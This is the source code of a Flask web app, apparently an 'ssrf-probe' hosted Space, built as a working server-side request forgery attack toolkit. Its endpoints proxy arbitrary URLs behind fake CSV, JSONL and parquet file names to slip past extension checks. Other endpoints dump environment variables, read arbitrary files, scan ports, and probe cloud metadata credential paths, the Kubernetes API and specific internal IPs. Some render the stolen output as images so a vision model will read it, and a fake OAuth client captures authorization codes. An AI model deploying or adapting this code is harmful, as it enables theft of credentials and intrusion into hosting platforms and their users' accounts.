Spaces:
Running
Running
| from flask import Flask, request, jsonify, redirect, Response, make_response | |
| import requests, os, socket, json, time | |
| app = Flask(__name__) | |
| LOG = [] | |
| def index(): | |
| return 'OK' | |
| def log_request(): | |
| entry = { | |
| 'time': time.time(), | |
| 'method': request.method, | |
| 'path': request.full_path, | |
| 'headers': dict(request.headers), | |
| 'body': request.get_data(as_text=True)[:2000], | |
| 'remote_addr': request.remote_addr | |
| } | |
| LOG.append(entry) | |
| return 'logged' | |
| def show_logs(): | |
| return jsonify(LOG[-200:]) | |
| def clear_logs(): | |
| LOG.clear() | |
| return 'cleared' | |
| def fetch(): | |
| url = request.args.get('url', '') | |
| headers = {} | |
| for h in request.args.get('headers', '').split(','): | |
| if ':' in h: | |
| k, v = h.split(':', 1) | |
| headers[k] = v.replace('+', ' ') | |
| try: | |
| r = requests.get(url, headers=headers, timeout=5, verify=False) | |
| return r.text, r.status_code, {'Content-Type': 'text/plain'} | |
| except Exception as e: | |
| return str(e), 500 | |
| def redir(): | |
| target = request.args.get('url', '/') | |
| code = int(request.args.get('code', '302')) | |
| entry = { | |
| 'time': time.time(), | |
| 'method': request.method, | |
| 'path': request.full_path, | |
| 'headers': dict(request.headers), | |
| 'remote_addr': request.remote_addr | |
| } | |
| LOG.append(entry) | |
| return redirect(target, code=code) | |
| # Redirect endpoint that looks like a CSV file | |
| def redir_csv(): | |
| target = request.args.get('t', '/') | |
| code = int(request.args.get('code', '302')) | |
| entry = { | |
| 'time': time.time(), | |
| 'method': request.method, | |
| 'path': request.full_path, | |
| 'headers': dict(request.headers), | |
| 'remote_addr': request.remote_addr | |
| } | |
| LOG.append(entry) | |
| return redirect(target, code=code) | |
| # Redirect that looks like a JSONL file | |
| def redir_jsonl(): | |
| target = request.args.get('t', '/') | |
| code = int(request.args.get('code', '302')) | |
| entry = { | |
| 'time': time.time(), | |
| 'method': request.method, | |
| 'path': request.full_path, | |
| 'headers': dict(request.headers), | |
| 'remote_addr': request.remote_addr | |
| } | |
| LOG.append(entry) | |
| return redirect(target, code=code) | |
| # Redirect that looks like a parquet file | |
| def redir_parquet(): | |
| target = request.args.get('t', '/') | |
| code = int(request.args.get('code', '302')) | |
| entry = { | |
| 'time': time.time(), | |
| 'method': request.method, | |
| 'path': request.full_path, | |
| 'headers': dict(request.headers), | |
| 'remote_addr': request.remote_addr | |
| } | |
| LOG.append(entry) | |
| return redirect(target, code=code) | |
| # Smart proxy CSV: fetches any URL and returns result as CSV | |
| def proxy_csv(): | |
| target = request.args.get('t', '') | |
| entry = { | |
| 'time': time.time(), | |
| 'method': request.method, | |
| 'path': request.full_path, | |
| 'headers': dict(request.headers), | |
| 'remote_addr': request.remote_addr | |
| } | |
| LOG.append(entry) | |
| if not target: | |
| return 'text\nno target specified\n', 200, {'Content-Type': 'text/csv'} | |
| try: | |
| r = requests.get(target, timeout=10, verify=False) | |
| lines = r.text.split('\n')[:100] | |
| csv_data = 'text\n' + '\n'.join(f'"{line}"' for line in lines if line.strip()) + '\n' | |
| return csv_data, 200, {'Content-Type': 'text/csv'} | |
| except Exception as e: | |
| return f'text\nerror: {str(e)}\n', 200, {'Content-Type': 'text/csv'} | |
| # Smart proxy JSONL | |
| def proxy_jsonl(): | |
| target = request.args.get('t', '') | |
| entry = { | |
| 'time': time.time(), | |
| 'method': request.method, | |
| 'path': request.full_path, | |
| 'headers': dict(request.headers), | |
| 'remote_addr': request.remote_addr | |
| } | |
| LOG.append(entry) | |
| if not target: | |
| return '{"text": "no target"}\n', 200, {'Content-Type': 'application/jsonl'} | |
| try: | |
| r = requests.get(target, timeout=10, verify=False) | |
| lines = r.text.split('\n')[:100] | |
| jsonl_data = '\n'.join(json.dumps({"text": line}) for line in lines if line.strip()) + '\n' | |
| return jsonl_data, 200, {'Content-Type': 'application/jsonl'} | |
| except Exception as e: | |
| return json.dumps({"text": f"error: {str(e)}"}) + '\n', 200, {'Content-Type': 'application/jsonl'} | |
| # Path-based proxy CSV: target URL is in the path, filename is data.csv | |
| # URL format: /p/<base64_encoded_target>/data.csv | |
| # This way the basename is always data.csv (passes extension check) | |
| import base64 | |
| def path_proxy_csv(target_b64): | |
| entry = { | |
| 'time': time.time(), | |
| 'method': request.method, | |
| 'path': request.full_path, | |
| 'headers': dict(request.headers), | |
| 'remote_addr': request.remote_addr | |
| } | |
| LOG.append(entry) | |
| try: | |
| target = base64.urlsafe_b64decode(target_b64 + '==').decode() | |
| except Exception: | |
| return 'text\nerror: invalid target encoding\n', 200, {'Content-Type': 'text/csv'} | |
| if request.method == 'HEAD': | |
| resp = make_response('', 200) | |
| resp.headers['Content-Type'] = 'text/csv' | |
| resp.headers['Content-Length'] = '100' | |
| return resp | |
| try: | |
| r = requests.get(target, timeout=10, verify=False) | |
| lines = r.text.split('\n')[:100] | |
| csv_data = 'text\n' + '\n'.join(f'"{line}"' for line in lines if line.strip()) + '\n' | |
| return csv_data, 200, {'Content-Type': 'text/csv'} | |
| except Exception as e: | |
| return f'text\nerror: {str(e)}\n', 200, {'Content-Type': 'text/csv'} | |
| # Path-based proxy JSONL | |
| def path_proxy_jsonl(target_b64): | |
| entry = { | |
| 'time': time.time(), | |
| 'method': request.method, | |
| 'path': request.full_path, | |
| 'headers': dict(request.headers), | |
| 'remote_addr': request.remote_addr | |
| } | |
| LOG.append(entry) | |
| try: | |
| target = base64.urlsafe_b64decode(target_b64 + '==').decode() | |
| except Exception: | |
| return '{"text": "error: invalid target encoding"}\n', 200, {'Content-Type': 'application/jsonl'} | |
| if request.method == 'HEAD': | |
| resp = make_response('', 200) | |
| resp.headers['Content-Type'] = 'application/jsonl' | |
| resp.headers['Content-Length'] = '100' | |
| return resp | |
| try: | |
| r = requests.get(target, timeout=10, verify=False) | |
| lines = r.text.split('\n')[:100] | |
| jsonl_data = '\n'.join(json.dumps({"text": line}) for line in lines if line.strip()) + '\n' | |
| return jsonl_data, 200, {'Content-Type': 'application/jsonl'} | |
| except Exception as e: | |
| return json.dumps({"text": f"error: {str(e)}"}) + '\n', 200, {'Content-Type': 'application/jsonl'} | |
| def serve_csv(): | |
| entry = { | |
| 'time': time.time(), | |
| 'method': request.method, | |
| 'path': request.full_path, | |
| 'headers': dict(request.headers), | |
| 'body': request.get_data(as_text=True)[:2000], | |
| 'remote_addr': request.remote_addr | |
| } | |
| LOG.append(entry) | |
| return 'text\nhello world\nssrf confirmed\n', 200, {'Content-Type': 'text/csv'} | |
| def serve_jsonl(): | |
| entry = { | |
| 'time': time.time(), | |
| 'method': request.method, | |
| 'path': request.full_path, | |
| 'headers': dict(request.headers), | |
| 'body': request.get_data(as_text=True)[:2000], | |
| 'remote_addr': request.remote_addr | |
| } | |
| LOG.append(entry) | |
| return '{"text": "hello world"}\n{"text": "ssrf confirmed"}\n', 200, {'Content-Type': 'application/jsonl'} | |
| def env(): | |
| return jsonify(dict(os.environ)) | |
| def scan(): | |
| host = request.args.get('host', '') | |
| ports = request.args.get('ports', '80,443').split(',') | |
| timeout = float(request.args.get('timeout', '1')) | |
| results = {} | |
| for p in ports: | |
| try: | |
| s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| s.settimeout(timeout) | |
| r = s.connect_ex((host, int(p))) | |
| results[p] = 'open' if r == 0 else 'closed' | |
| s.close() | |
| except Exception as e: | |
| results[p] = str(e) | |
| return jsonify(results) | |
| def resolve(): | |
| host = request.args.get('host', '') | |
| try: | |
| return jsonify({'ip': socket.gethostbyname(host), 'host': host}) | |
| except Exception as e: | |
| return jsonify({'error': str(e)}) | |
| def readfile(): | |
| path = request.args.get('path', '') | |
| try: | |
| with open(path, 'r') as f: | |
| return f.read()[:10000], 200, {'Content-Type': 'text/plain'} | |
| except Exception as e: | |
| return str(e), 500 | |
| def listdir(): | |
| path = request.args.get('path', '/') | |
| try: | |
| entries = os.listdir(path) | |
| return jsonify(entries) | |
| except Exception as e: | |
| return jsonify({'error': str(e)}) | |
| def do_post(): | |
| url = request.args.get('url', '') | |
| body = request.args.get('body', '') | |
| ct = request.args.get('ct', 'application/json') | |
| headers = {'Content-Type': ct} | |
| for h in request.args.get('headers', '').split(','): | |
| if ':' in h: | |
| k, v = h.split(':', 1) | |
| headers[k] = v.replace('+', ' ') | |
| try: | |
| r = requests.post(url, data=body, headers=headers, timeout=10, verify=False) | |
| return r.text, r.status_code, {'Content-Type': 'text/plain'} | |
| except Exception as e: | |
| return str(e), 500 | |
| def selfenv_csv(): | |
| entry = {'time': time.time(), 'method': request.method, 'path': request.full_path, | |
| 'headers': dict(request.headers), 'remote_addr': request.remote_addr} | |
| LOG.append(entry) | |
| try: | |
| r = requests.get('http://localhost:7860/env', timeout=5) | |
| data = r.json() | |
| csv_lines = ['key,value'] | |
| for k, v in data.items(): | |
| csv_lines.append(f'"{k}","{str(v)[:200]}"') | |
| return '\n'.join(csv_lines) + '\n', 200, {'Content-Type': 'text/csv'} | |
| except Exception as e: | |
| return f'key,value\nerror,"{str(e)}"\n', 200, {'Content-Type': 'text/csv'} | |
| def k8s_csv(): | |
| entry = {'time': time.time(), 'method': request.method, 'path': request.full_path, | |
| 'headers': dict(request.headers), 'remote_addr': request.remote_addr} | |
| LOG.append(entry) | |
| targets = [ | |
| 'https://172.20.0.1:443/api', | |
| 'https://kubernetes.default.svc:443/api', | |
| 'http://172.20.0.1:80/api', | |
| ] | |
| results = [] | |
| for t in targets: | |
| try: | |
| r = requests.get(t, timeout=3, verify=False) | |
| results.append(f'"{t}","{r.status_code}","{r.text[:200]}"') | |
| except Exception as e: | |
| results.append(f'"{t}","error","{str(e)[:100]}"') | |
| return 'target,status,response\n' + '\n'.join(results) + '\n', 200, {'Content-Type': 'text/csv'} | |
| def metadata_csv(): | |
| entry = {'time': time.time(), 'method': request.method, 'path': request.full_path, | |
| 'headers': dict(request.headers), 'remote_addr': request.remote_addr} | |
| LOG.append(entry) | |
| targets = [ | |
| ('http://169.254.169.254/latest/meta-data/', {}), | |
| ('http://169.254.169.254/latest/meta-data/iam/security-credentials/', {}), | |
| ('http://metadata.google.internal/computeMetadata/v1/', {'Metadata-Flavor': 'Google'}), | |
| ('http://100.100.100.200/latest/meta-data/', {}), | |
| ] | |
| results = [] | |
| for url, hdrs in targets: | |
| try: | |
| r = requests.get(url, headers=hdrs, timeout=3, verify=False) | |
| results.append(f'"{url}","{r.status_code}","{r.text[:200]}"') | |
| except Exception as e: | |
| results.append(f'"{url}","error","{str(e)[:100]}"') | |
| return 'target,status,response\n' + '\n'.join(results) + '\n', 200, {'Content-Type': 'text/csv'} | |
| def internalprobe_csv(): | |
| entry = {'time': time.time(), 'method': request.method, 'path': request.full_path, | |
| 'headers': dict(request.headers), 'remote_addr': request.remote_addr} | |
| LOG.append(entry) | |
| targets = [ | |
| 'http://10.16.4.123:80/', | |
| 'http://10.16.34.155:80/', | |
| 'http://10.20.1.9:80/', | |
| 'http://10.20.31.87:80/', | |
| ] | |
| results = [] | |
| for t in targets: | |
| try: | |
| r = requests.get(t, timeout=3, verify=False) | |
| results.append(f'"{t}","{r.status_code}","{r.text[:200]}"') | |
| except Exception as e: | |
| results.append(f'"{t}","error","{str(e)[:100]}"') | |
| return 'target,status,response\n' + '\n'.join(results) + '\n', 200, {'Content-Type': 'text/csv'} | |
| def selfenv_jsonl(): | |
| entry = {'time': time.time(), 'method': request.method, 'path': request.full_path, | |
| 'headers': dict(request.headers), 'remote_addr': request.remote_addr} | |
| LOG.append(entry) | |
| try: | |
| r = requests.get('http://localhost:7860/env', timeout=5) | |
| data = r.json() | |
| lines = [json.dumps({"text": f"{k}={str(v)[:200]}"}) for k, v in data.items()] | |
| return '\n'.join(lines) + '\n', 200, {'Content-Type': 'application/jsonl'} | |
| except Exception as e: | |
| return json.dumps({"text": f"error: {str(e)}"}) + '\n', 200, {'Content-Type': 'application/jsonl'} | |
| # Image proxy - fetches URL, renders response text into a PNG image | |
| # The vision model will read the text from the image | |
| from PIL import Image, ImageDraw, ImageFont | |
| import io | |
| def img_proxy(): | |
| """Fetch a URL and render its response as text in an image""" | |
| target = request.args.get('url', '') | |
| entry = {'time': time.time(), 'method': request.method, 'path': request.full_path, | |
| 'headers': dict(request.headers), 'remote_addr': request.remote_addr} | |
| LOG.append(entry) | |
| if not target: | |
| text = "No URL specified" | |
| else: | |
| try: | |
| hdrs = {} | |
| if 'metadata.google' in target: | |
| hdrs['Metadata-Flavor'] = 'Google' | |
| r = requests.get(target, headers=hdrs, timeout=5, verify=False) | |
| text = f"URL: {target}\nStatus: {r.status_code}\nHeaders: {dict(r.headers)}\n\nBody:\n{r.text[:3000]}" | |
| except Exception as e: | |
| text = f"URL: {target}\nError: {str(e)}" | |
| # Render text into image | |
| lines = text.split('\n') | |
| img_width = 800 | |
| line_height = 16 | |
| img_height = max(200, (len(lines) + 2) * line_height) | |
| img = Image.new('RGB', (img_width, img_height), color='white') | |
| draw = ImageDraw.Draw(img) | |
| y = 10 | |
| for line in lines: | |
| draw.text((10, y), line[:100], fill='black') | |
| y += line_height | |
| buf = io.BytesIO() | |
| img.save(buf, format='PNG') | |
| buf.seek(0) | |
| return buf.getvalue(), 200, {'Content-Type': 'image/png'} | |
| def img_env(): | |
| """Render Space environment variables as text in an image""" | |
| entry = {'time': time.time(), 'method': request.method, 'path': request.full_path, | |
| 'headers': dict(request.headers), 'remote_addr': request.remote_addr} | |
| LOG.append(entry) | |
| text = "Space Environment:\n" | |
| for k, v in sorted(os.environ.items()): | |
| text += f"{k}={str(v)[:100]}\n" | |
| lines = text.split('\n') | |
| img_width = 800 | |
| line_height = 16 | |
| img_height = max(200, (len(lines) + 2) * line_height) | |
| img = Image.new('RGB', (img_width, img_height), color='white') | |
| draw = ImageDraw.Draw(img) | |
| y = 10 | |
| for line in lines: | |
| draw.text((10, y), line[:100], fill='black') | |
| y += line_height | |
| buf = io.BytesIO() | |
| img.save(buf, format='PNG') | |
| buf.seek(0) | |
| return buf.getvalue(), 200, {'Content-Type': 'image/png'} | |
| def img_internal(): | |
| """Fetch internal endpoints and render results as image""" | |
| entry = {'time': time.time(), 'method': request.method, 'path': request.full_path, | |
| 'headers': dict(request.headers), 'remote_addr': request.remote_addr} | |
| LOG.append(entry) | |
| text = "Internal Network Probe:\n\n" | |
| targets = [ | |
| 'http://169.254.169.254/latest/meta-data/', | |
| 'http://169.254.169.254/latest/meta-data/iam/security-credentials/', | |
| 'http://10.0.249.125/', | |
| 'http://10.0.249.125/api/whoami-v2', | |
| ] | |
| for t in targets: | |
| try: | |
| r = requests.get(t, timeout=3, verify=False) | |
| text += f"[{t}] {r.status_code}: {r.text[:200]}\n" | |
| except Exception as e: | |
| text += f"[{t}] Error: {str(e)[:100]}\n" | |
| lines = text.split('\n') | |
| img_width = 800 | |
| line_height = 16 | |
| img_height = max(200, (len(lines) + 2) * line_height) | |
| img = Image.new('RGB', (img_width, img_height), color='white') | |
| draw = ImageDraw.Draw(img) | |
| y = 10 | |
| for line in lines: | |
| draw.text((10, y), line[:100], fill='black') | |
| y += line_height | |
| buf = io.BytesIO() | |
| img.save(buf, format='PNG') | |
| buf.seek(0) | |
| return buf.getvalue(), 200, {'Content-Type': 'image/png'} | |
| # Serve a valid small test image | |
| def test_png(): | |
| entry = {'time': time.time(), 'method': request.method, 'path': request.full_path, | |
| 'headers': dict(request.headers), 'remote_addr': request.remote_addr} | |
| LOG.append(entry) | |
| img = Image.new('RGB', (200, 100), color='red') | |
| draw = ImageDraw.Draw(img) | |
| draw.text((10, 10), "SSRF TEST IMAGE", fill='white') | |
| draw.text((10, 30), f"Time: {time.time()}", fill='white') | |
| buf = io.BytesIO() | |
| img.save(buf, format='PNG') | |
| buf.seek(0) | |
| return buf.getvalue(), 200, {'Content-Type': 'image/png'} | |
| def cimd(): | |
| """Client ID Metadata Document endpoint for CIMD testing""" | |
| entry = { | |
| "time": time.time(), | |
| "method": request.method, | |
| "path": request.full_path, | |
| "headers": dict(request.headers), | |
| "remote_addr": request.remote_addr, | |
| "note": "CIMD_FETCH" | |
| } | |
| LOG.append(entry) | |
| metadata = { | |
| "client_id": "https://firstaccount69-ssrf-probe.hf.space/.well-known/oauth-client", | |
| "client_name": "SSRF Probe CIMD Test", | |
| "redirect_uris": ["https://firstaccount69-ssrf-probe.hf.space/callback"], | |
| "scope": "openid profile email read-repos write-repos manage-repos", | |
| "grant_types": ["authorization_code", "refresh_token", "urn:ietf:params:oauth:grant-type:token-exchange"], | |
| "response_types": ["code"], | |
| "token_endpoint_auth_method": "none" | |
| } | |
| return jsonify(metadata) | |
| def oauth_callback(): | |
| """OAuth callback to capture authorization codes""" | |
| entry = { | |
| "time": time.time(), | |
| "method": request.method, | |
| "path": request.full_path, | |
| "headers": dict(request.headers), | |
| "args": dict(request.args), | |
| "remote_addr": request.remote_addr, | |
| "note": "OAUTH_CALLBACK" | |
| } | |
| LOG.append(entry) | |
| return jsonify({"status": "captured", "args": dict(request.args)}) | |
| if __name__ == '__main__': | |
| app.run(host='0.0.0.0', port=7860) | |